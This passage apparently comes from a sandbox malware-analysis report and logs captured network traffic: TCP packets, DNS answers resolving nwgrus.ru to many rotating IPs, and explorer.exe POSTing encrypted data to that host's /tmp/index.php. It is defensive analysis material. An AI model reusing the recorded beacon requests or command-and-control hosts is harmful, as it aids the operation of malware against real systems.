                                                                                                      Oct 8, 2024 00:20:55.555185080 CEST4434996023.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:55.555258989 CEST49960443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:55.555357933 CEST49960443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:55.555372953 CEST4434996023.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:55.555403948 CEST49960443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:55.555409908 CEST4434996023.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:55.558237076 CEST49966443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:55.558271885 CEST4434996623.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:55.558336020 CEST49966443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:55.558594942 CEST49966443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:55.558607101 CEST4434996623.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:56.141876936 CEST4434996623.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:56.142060041 CEST49966443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:56.143140078 CEST49966443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:56.143151045 CEST4434996623.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:56.143470049 CEST4434996623.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:56.144145012 CEST49966443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:56.144176960 CEST49966443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:56.144181013 CEST4434996623.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:56.434613943 CEST4434996623.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:56.434676886 CEST4434996623.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:56.434777021 CEST49966443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:56.434998035 CEST49966443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:56.434998035 CEST49966443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:56.435019016 CEST4434996623.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:56.435030937 CEST4434996623.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:56.438404083 CEST49972443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:56.438448906 CEST4434997223.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:56.438539982 CEST49972443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:56.438826084 CEST49972443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:56.438839912 CEST4434997223.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:57.016237974 CEST4434997223.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:57.016326904 CEST49972443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:57.018471003 CEST49972443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:57.018484116 CEST4434997223.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:57.018757105 CEST4434997223.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:57.019530058 CEST49972443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:57.019551039 CEST49972443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:57.019606113 CEST4434997223.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:57.296246052 CEST4434997223.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:57.296305895 CEST4434997223.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:57.296387911 CEST49972443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:57.296484947 CEST49972443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:57.296500921 CEST4434997223.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:57.296519995 CEST49972443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:57.296525955 CEST4434997223.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:57.306592941 CEST49978443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:57.306629896 CEST4434997823.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:57.306859016 CEST49978443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:57.307238102 CEST49978443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:57.307254076 CEST4434997823.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:57.884557962 CEST4434997823.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:57.884738922 CEST49978443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:57.886112928 CEST49978443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:57.886125088 CEST4434997823.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:57.886408091 CEST4434997823.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:57.887291908 CEST49978443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:57.887378931 CEST49978443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:57.887389898 CEST4434997823.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:58.168375969 CEST4434997823.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:58.168448925 CEST4434997823.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:58.168560982 CEST49978443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:58.168721914 CEST49978443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:58.168737888 CEST4434997823.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:58.168880939 CEST49978443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:58.168886900 CEST4434997823.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:58.180068016 CEST49984443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:20:58.180114985 CEST4434998423.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:20:58.180306911 CEST49984443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:51.608006954 CEST8050061109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:52.354597092 CEST8050061109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:52.355051994 CEST8050061109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:52.355257034 CEST5006180192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:52.356561899 CEST5006180192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:52.363363981 CEST8050061109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:22:07.694593906 CEST5006280192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:22:07.699466944 CEST8050062109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:22:07.699584961 CEST5006280192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:22:07.699738979 CEST5006280192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:22:07.699768066 CEST5006280192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:22:07.704714060 CEST8050062109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:22:07.704726934 CEST8050062109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:22:08.471247911 CEST8050062109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:22:08.472786903 CEST8050062109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:22:08.472860098 CEST5006280192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:22:08.472944975 CEST5006280192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:22:08.478990078 CEST8050062109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:22:26.981128931 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:26.981177092 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:26.981710911 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:26.981712103 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:26.981750965 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:27.552356958 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:27.552483082 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:27.553685904 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:27.553694010 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:27.553940058 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:27.582811117 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:27.582858086 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:27.583077908 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:27.911839008 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:27.911931992 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:27.912015915 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:27.912128925 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:27.912151098 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:27.912240982 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:27.912245989 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:28.574995041 CEST5006480192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:28.579853058 CEST8050064211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:28.579948902 CEST5006480192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:28.580086946 CEST5006480192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:28.580101013 CEST5006480192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:28.584973097 CEST8050064211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:28.584996939 CEST8050064211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:30.172260046 CEST8050064211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:30.172914982 CEST8050064211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:30.172981977 CEST5006480192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:30.174947977 CEST5006480192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:30.181123018 CEST8050064211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:49.156351089 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:49.156460047 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:49.156564951 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:49.156943083 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:49.156980038 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:49.725234985 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:49.725334883 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:49.726571083 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:49.726594925 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:49.726866007 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:49.728025913 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:49.728060961 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:49.728121996 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:50.083858013 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:50.084044933 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:50.084129095 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:50.084191084 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:50.084228992 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:50.084255934 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:50.084270954 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:51.264605999 CEST5006680192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:51.269917011 CEST8050066211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:51.270133972 CEST5006680192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:51.271368027 CEST5006680192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:51.271368027 CEST5006680192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:51.276216030 CEST8050066211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:51.276231050 CEST8050066211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:52.888025045 CEST8050066211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:52.888273954 CEST8050066211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:52.888319969 CEST5006680192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:52.888880968 CEST5006680192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:52.895714045 CEST8050066211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:23:13.661993980 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:13.662033081 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:13.662115097 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:13.662417889 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:13.662422895 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:14.224329948 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:14.224401951 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:14.225620985 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:14.225625992 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:14.225884914 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:14.226563931 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:14.226592064 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:14.226624012 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:14.580030918 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:14.580107927 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:14.580163956 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:14.580327988 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:14.580343962 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:14.580355883 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:14.580360889 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:16.750488997 CEST5006880192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:23:16.756223917 CEST8050068211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:23:16.756345987 CEST5006880192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:23:16.756416082 CEST5006880192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:23:16.756416082 CEST5006880192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:23:16.762480021 CEST8050068211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:23:16.763006926 CEST8050068211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:23:20.287751913 CEST8050068211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:23:20.288213968 CEST8050068211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:23:20.288275003 CEST5006880192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:23:20.288321972 CEST5006880192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:23:20.296267033 CEST8050068211.171.233.129192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 8, 2024 00:19:53.624926090 CEST | 192.168.2.4 | 1.1.1.1 | 0x7a5e | Standard query (0) | nwgrus.ru | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:54.639575005 CEST | 192.168.2.4 | 1.1.1.1 | 0x7a5e | Standard query (0) | nwgrus.ru | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.656968117 CEST | 192.168.2.4 | 1.1.1.1 | 0x7a5e | Standard query (0) | nwgrus.ru | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:20:41.741137028 CEST | 192.168.2.4 | 1.1.1.1 | 0x1e50 | Standard query (0) | ninjahallnews.com | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:22:28.020339012 CEST | 192.168.2.4 | 1.1.1.1 | 0x478b | Standard query (0) | nwgrus.ru | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 00:19:48.535267115 CEST | 1.1.1.1 | 192.168.2.4 | 0xc1fc | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 00:19:48.535267115 CEST | 1.1.1.1 | 192.168.2.4 | 0xc1fc | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.727994919 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 109.175.29.39 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.727994919 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 185.18.245.58 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.727994919 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 190.147.128.172 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.727994919 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 220.125.3.190 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.727994919 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 123.213.233.131 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.727994919 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 190.249.249.14 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.727994919 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 186.123.165.48 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.727994919 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 190.219.117.240 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.727994919 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 187.211.161.52 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.727994919 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 154.144.253.197 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728008986 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 109.175.29.39 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728008986 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 185.18.245.58 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728008986 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 190.147.128.172 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728008986 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 220.125.3.190 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728008986 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 123.213.233.131 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728008986 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 190.249.249.14 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728008986 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 186.123.165.48 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728008986 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 190.219.117.240 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728008986 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 187.211.161.52 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728008986 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 154.144.253.197 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728013039 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 109.175.29.39 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728013039 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 185.18.245.58 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728013039 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 190.147.128.172 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728013039 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 220.125.3.190 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728013039 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 123.213.233.131 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728013039 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 190.249.249.14 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728013039 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 186.123.165.48 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728013039 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 190.219.117.240 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728013039 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 187.211.161.52 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:19:55.728013039 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a5e | No error (0) | nwgrus.ru | | 154.144.253.197 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:20:22.805046082 CEST | 1.1.1.1 | 192.168.2.4 | 0x809a | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 00:20:22.805046082 CEST | 1.1.1.1 | 192.168.2.4 | 0x809a | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:20:41.782227993 CEST | 1.1.1.1 | 192.168.2.4 | 0x1e50 | No error (0) | ninjahallnews.com | | 23.145.40.168 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:22:28.574058056 CEST | 1.1.1.1 | 192.168.2.4 | 0x478b | No error (0) | nwgrus.ru | | 211.171.233.129 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:22:28.574058056 CEST | 1.1.1.1 | 192.168.2.4 | 0x478b | No error (0) | nwgrus.ru | | 189.143.207.58 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:22:28.574058056 CEST | 1.1.1.1 | 192.168.2.4 | 0x478b | No error (0) | nwgrus.ru | | 181.28.104.6 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:22:28.574058056 CEST | 1.1.1.1 | 192.168.2.4 | 0x478b | No error (0) | nwgrus.ru | | 190.224.203.37 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:22:28.574058056 CEST | 1.1.1.1 | 192.168.2.4 | 0x478b | No error (0) | nwgrus.ru | | 181.52.122.51 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:22:28.574058056 CEST | 1.1.1.1 | 192.168.2.4 | 0x478b | No error (0) | nwgrus.ru | | 130.204.29.121 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:22:28.574058056 CEST | 1.1.1.1 | 192.168.2.4 | 0x478b | No error (0) | nwgrus.ru | | 2.185.214.11 | A (IP address) | IN (0x0001) | false
                                                                                                      Oct 8, 2024 00:22:28.574058056 CEST1.1.1.1192.168.2.40x478bNo error (0)nwgrus.ru212.112.110.243A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:22:28.574058056 CEST1.1.1.1192.168.2.40x478bNo error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:22:28.574058056 CEST1.1.1.1192.168.2.40x478bNo error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:19:55.737164021 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fopeiyjgdmtd.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 244
Host: nwgrus.ru
Oct 8, 2024 00:19:55.737196922 CEST | 244 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5a 24 a6 a3
Oct 8, 2024 00:19:56.520555973 CEST | 152 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:19:56 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 04 00 00 00 72 e8 87 ed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:19:57.174031019 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bwtyrvoeqafgvbf.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 300
Host: nwgrus.ru
Oct 8, 2024 00:19:57.174042940 CEST | 300 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 3d 00 dd e8
Oct 8, 2024 00:19:57.933917046 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:19:57 GMT
Content-Type: text/html; charset=utf-8
Connection: close
